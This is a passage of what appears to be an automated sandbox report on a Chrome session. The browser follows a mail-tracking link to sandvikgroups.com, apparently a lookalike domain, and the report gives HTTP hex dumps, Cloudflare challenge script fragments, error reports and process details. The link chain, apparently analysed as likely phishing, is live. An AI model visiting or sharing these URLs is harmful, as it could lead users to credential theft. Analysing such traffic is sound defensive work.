                                        2025-01-07 21:06:29 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:06:29 UTC1369INData Raw: 31 2e 32 2e 31 2e 31 2d 58 74 69 6e 56 4e 58 45 50 62 48 4e 4a 75 41 57 4d 32 4a 41 66 53 61 55 5a 6c 44 68 4b 64 59 32 41 53 59 6a 32 70 73 4f 6c 6f 32 36 54 56 32 50 71 4c 32 76 79 35 47 42 56 6f 46 6a 41 4c 47 4d 4c 54 68 56 49 4c 73 37 4d 59 42 74 45 42 48 44 42 35 6d 30 69 4b 7a 76 70 77 79 36 63 37 49 42 76 6a 61 57 6d 75 5f 76 76 49 6b 4d 75 48 33 55 61 6e 51 64 4f 79 47 41 64 41 61 71 4e 46 4a 47 78 37 41 55 47 55 43 54 44 6c 7a 61 67 43 6c 33 77 2e 6d 74 5a 32 4b 62 41 34 38 4f 77 35 6d 4b 55 76 54 71 64 50 4b 31 42 72 59 6f 5f 62 6c 38 63 4a 48 76 32 4e 59 58 70 47 71 6e 6d 59 4b 38 66 4a 6d 67 6b 4e 43 37 76 47 6e 6a 65 5a 64 38 4a 51 77 71 51 36 62 42 4b 4c 66 37 47 46 4f 48 56 6c 66 69 6a 72 4a 65 6a 68 5f 68 71 34 6d 51 49 73 55 55 6e 41 5f
                                        Data Ascii: 1.2.1.1-XtinVNXEPbHNJuAWM2JAfSaUZlDhKdY2ASYj2psOlo26TV2PqL2vy5GBVoFjALGMLThVILs7MYBtEBHDB5m0iKzvpwy6c7IBvjaWmu_vvIkMuH3UanQdOyGAdAaqNFJGx7AUGUCTDlzagCl3w.mtZ2KbA48Ow5mKUvTqdPK1BrYo_bl8cJHv2NYXpGqnmYK8fJmgkNC7vGnjeZd8JQwqQ6bBKLf7GFOHVlfijrJejh_hq4mQIsUUnA_
                                        2025-01-07 21:06:29 UTC1369INData Raw: 6a 5f 74 31 6a 48 48 36 56 42 65 63 6d 31 78 7a 66 75 52 4c 4a 6f 7a 39 35 4a 6b 68 55 4b 4f 7a 4e 78 52 4a 53 36 66 45 63 68 6a 46 42 61 37 75 6b 4d 54 6a 49 6d 32 53 4f 64 6f 6d 67 68 67 47 6f 32 6e 36 63 44 4b 32 56 6f 62 77 5f 50 58 58 63 64 50 37 5a 47 2e 44 76 67 61 33 52 54 6f 54 64 69 42 73 79 32 57 68 57 53 56 43 30 52 42 54 39 32 31 35 4e 62 39 5f 54 56 51 7a 42 46 6a 73 6f 50 38 5f 67 78 31 4d 7a 4f 62 46 64 49 52 59 58 6e 30 31 4c 72 30 4f 62 52 69 54 55 30 61 7a 6d 7a 47 6f 34 42 78 49 30 4e 7a 54 61 54 63 30 70 67 43 70 63 51 34 49 2e 41 4f 4f 78 62 39 43 6e 37 33 77 50 6a 7a 32 48 53 66 6e 53 71 35 37 33 43 77 64 46 46 76 46 73 48 37 57 4b 6e 6e 48 67 4c 5a 6f 48 52 61 73 72 36 7a 79 62 31 55 74 38 33 33 32 58 75 58 71 41 6b 71 35 6e 5a 4a
                                        Data Ascii: j_t1jHH6VBecm1xzfuRLJoz95JkhUKOzNxRJS6fEchjFBa7ukMTjIm2SOdomghgGo2n6cDK2Vobw_PXXcdP7ZG.Dvga3RToTdiBsy2WhWSVC0RBT9215Nb9_TVQzBFjsoP8_gx1MzObFdIRYXn01Lr0ObRiTU0azmzGo4BxI0NzTaTc0pgCpcQ4I.AOOxb9Cn73wPjz2HSfnSq573CwdFFvFsH7WKnnHgLZoHRasr6zyb1Ut8332XuXqAkq5nZJ
                                        2025-01-07 21:06:29 UTC1369INData Raw: 43 74 54 65 6c 4b 53 5a 70 42 32 56 71 4c 77 4b 74 53 46 45 77 79 67 58 50 51 31 6c 74 4b 68 4a 65 41 55 6c 5a 49 4c 48 6b 76 67 34 79 66 72 51 56 5a 38 6a 46 36 5a 4e 6e 49 51 68 70 76 63 43 62 56 4f 37 62 32 5f 47 41 72 67 63 76 59 37 57 5f 6d 4b 74 4b 4e 66 4e 58 44 38 76 36 42 31 50 76 54 63 77 6f 78 38 69 56 70 75 49 74 6a 4f 34 47 7a 31 75 53 44 6c 67 67 6a 74 33 30 7a 73 4a 6b 6b 4f 61 32 6b 71 46 5f 5f 76 36 34 30 37 5a 6d 6b 39 31 79 36 70 6a 77 67 65 45 77 7a 64 65 53 71 61 4c 64 5a 4f 47 64 56 30 4a 38 36 30 33 53 6b 4d 44 78 68 58 42 7a 32 62 50 4f 34 38 70 6a 55 36 33 2e 4b 53 35 47 69 65 6e 38 48 73 50 45 5f 66 6e 58 42 4f 55 72 68 41 57 67 52 5f 4c 65 38 35 43 30 6b 46 43 43 5a 35 36 72 70 4c 6b 4f 71 6d 6a 46 7a 34 38 69 50 56 2e 38 79 38
                                        Data Ascii: CtTelKSZpB2VqLwKtSFEwygXPQ1ltKhJeAUlZILHkvg4yfrQVZ8jF6ZNnIQhpvcCbVO7b2_GArgcvY7W_mKtKNfNXD8v6B1PvTcwox8iVpuItjO4Gz1uSDlggjt30zsJkkOa2kqF__v6407Zmk91y6pjwgeEwzdeSqaLdZOGdV0J8603SkMDxhXBz2bPO48pjU63.KS5Gien8HsPE_fnXBOUrhAWgR_Le85C0kFCCZ56rpLkOqmjFz48iPV.8y8
                                        2025-01-07 21:06:29 UTC1369INData Raw: 4e 45 56 54 49 42 64 75 4c 71 5f 45 70 39 4c 55 2e 35 43 2e 54 6e 38 69 65 59 71 68 44 6d 47 77 58 58 5f 4d 31 38 4a 2e 4a 35 63 30 6e 68 30 2e 74 5f 42 45 33 69 46 71 75 35 30 4d 64 75 73 65 30 73 57 4a 30 33 49 58 5a 4f 72 30 35 41 55 42 47 68 54 4d 76 6c 36 53 65 35 46 65 74 35 37 4d 68 34 67 33 4e 6c 38 57 6d 73 5f 41 62 76 44 48 4b 69 31 2e 50 70 54 5a 5a 44 6c 6d 77 6d 39 49 4e 6e 69 32 4e 73 52 6c 6f 73 47 45 51 66 50 53 5a 37 65 71 44 4b 50 6e 6a 77 76 59 65 46 4a 47 38 6a 70 4a 35 36 52 76 41 75 36 6e 48 77 31 7a 5a 66 72 49 58 55 30 39 4f 77 39 41 4c 4f 68 77 56 57 77 54 66 71 62 4c 39 5a 39 4a 44 30 6d 4e 47 6c 4d 74 68 45 79 30 4c 41 6d 57 71 66 67 62 55 62 65 4d 42 49 59 48 4a 4b 67 61 6f 58 55 47 4e 47 39 7a 6b 4a 4c 69 48 77 64 70 6c 32 5a
                                        Data Ascii: NEVTIBduLq_Ep9LU.5C.Tn8ieYqhDmGwXX_M18J.J5c0nh0.t_BE3iFqu50Mduse0sWJ03IXZOr05AUBGhTMvl6Se5Fet57Mh4g3Nl8Wms_AbvDHKi1.PpTZZDlmwm9INni2NsRlosGEQfPSZ7eqDKPnjwvYeFJG8jpJ56RvAu6nHw1zZfrIXU09Ow9ALOhwVWwTfqbL9Z9JD0mNGlMthEy0LAmWqfgbUbeMBIYHJKgaoXUGNG9zkJLiHwdpl2Z
                                        2025-01-07 21:06:29 UTC570INData Raw: 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 22 5c 2f 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 5c 2f 6c 69 62 5c 2f 70 69 63 73 5c 2f 66
                                        Data Ascii: ).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null, "\/?get_link=ch_files\/lib\/pics\/f
                                        2025-01-07 21:06:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        53192.168.2.44991535.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:54 UTC550OUTOPTIONS /report/v4?s=c49IWze7srcYuJx6lyP0XuSm1SoJSQOGSkg1s58FHgcYGeHWjPKHQBO%2F6%2B5mgLUBau%2F2c%2FJBavvtAfbkGsxgpGiT89iig3SK5oa%2FlpAZ%2FwhuL7BhqcUcj8fUCcj05pzZcJO7sw%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Origin: https://sandvikgroups.com
                                        Access-Control-Request-Method: POST
                                        Access-Control-Request-Headers: content-type
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:55 UTC336INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        access-control-max-age: 86400
                                        access-control-allow-methods: OPTIONS, POST
                                        access-control-allow-origin: *
                                        access-control-allow-headers: content-type, content-length
                                        date: Tue, 07 Jan 2025 21:06:54 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        54192.168.2.44991735.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:54 UTC540OUTOPTIONS /report/v4?s=39o8bxp4G6BGm78rvdW0A46AsJHPTfnT4t1tR4V60cNEmTCSrYCUNxndbZldshNUFL8pvpw4SfJRHuzNYtN0fa0z02npaWS8%2Bb35o2w6Zc52yQEeC7jJzba5h9TKJzc8vgUu9A%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Origin: https://sandvikgroups.com
                                        Access-Control-Request-Method: POST
                                        Access-Control-Request-Headers: content-type
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:55 UTC336INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        access-control-max-age: 86400
                                        access-control-allow-methods: OPTIONS, POST
                                        access-control-allow-origin: *
                                        access-control-allow-headers: content-type, content-length
                                        date: Tue, 07 Jan 2025 21:06:54 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        55192.168.2.44992235.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:55 UTC491OUTPOST /report/v4?s=c49IWze7srcYuJx6lyP0XuSm1SoJSQOGSkg1s58FHgcYGeHWjPKHQBO%2F6%2B5mgLUBau%2F2c%2FJBavvtAfbkGsxgpGiT89iig3SK5oa%2FlpAZ%2FwhuL7BhqcUcj8fUCcj05pzZcJO7sw%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 2785
                                        Content-Type: application/reports+json
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:55 UTC2785OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 38 31 31 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6e 64 76 69 6b 67 72 6f 75 70
                                        Data Ascii: [{"age":58116,"body":{"elapsed_time":1103,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":403,"type":"http.error"},"type":"network-error","url":"https://sandvikgroup
                                        2025-01-07 21:06:55 UTC168INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        date: Tue, 07 Jan 2025 21:06:55 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        56192.168.2.44992335.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:55 UTC481OUTPOST /report/v4?s=39o8bxp4G6BGm78rvdW0A46AsJHPTfnT4t1tR4V60cNEmTCSrYCUNxndbZldshNUFL8pvpw4SfJRHuzNYtN0fa0z02npaWS8%2Bb35o2w6Zc52yQEeC7jJzba5h9TKJzc8vgUu9A%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 3429
                                        Content-Type: application/reports+json
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:55 UTC3429OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 37 31 31 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 38 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6e 64 76 69 6b 67 72 6f 75 70 73
                                        Data Ascii: [{"age":37112,"body":{"elapsed_time":687,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://sandvikgroups
                                        2025-01-07 21:06:55 UTC168INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        date: Tue, 07 Jan 2025 21:06:55 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:16:05:41
                                        Start date:07/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:2
                                        Start time:16:05:44
                                        Start date:07/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2240,i,15377954421907004897,9575579198436454196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:3
                                        Start time:16:05:51
                                        Start date:07/01/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw"
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        No disassembly